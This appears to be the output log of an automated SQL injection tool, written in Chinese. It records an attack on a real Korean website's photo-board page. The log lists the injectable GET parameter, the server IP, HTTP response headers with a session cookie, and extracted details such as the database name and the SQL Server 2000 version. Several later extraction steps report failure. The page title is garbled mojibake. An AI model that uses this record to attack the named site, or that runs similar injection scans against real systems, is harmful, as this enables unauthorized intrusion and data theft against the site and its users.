■漏洞信息:============================================================
 ・URL:http://www.yjguide.com/photoboard3/edit.asp?id=22&key=nscboard_leisure&idx=22
 ・页面标题：促剧茄 眉氰捞 乐绢 歹宽 榴芭款 康辆档 咯青
 ・参数:id=22&key=nscboard_leisure&idx=22
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.239.161.134
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:04:37 GMT
Server: WWW Server/1.1
X-Powered-By: ASP.NET
Content-Length: 48108
Content-Type: text/html
Expires: Sat, 02 Apr 2011 15:04:37 GMT
Set-Cookie: ASPSESSIONIDQASSSATA=FJKCLBPBEPGLPJAEOPGEJEIM; path=/
Cache-control: private



■数据库信息:============================================================
批次获取基本信息失败，开始逐一获取……
 ・当前数据库:db041576
 ・版本:Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) 
	Dec 16 2008 19:46:53 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
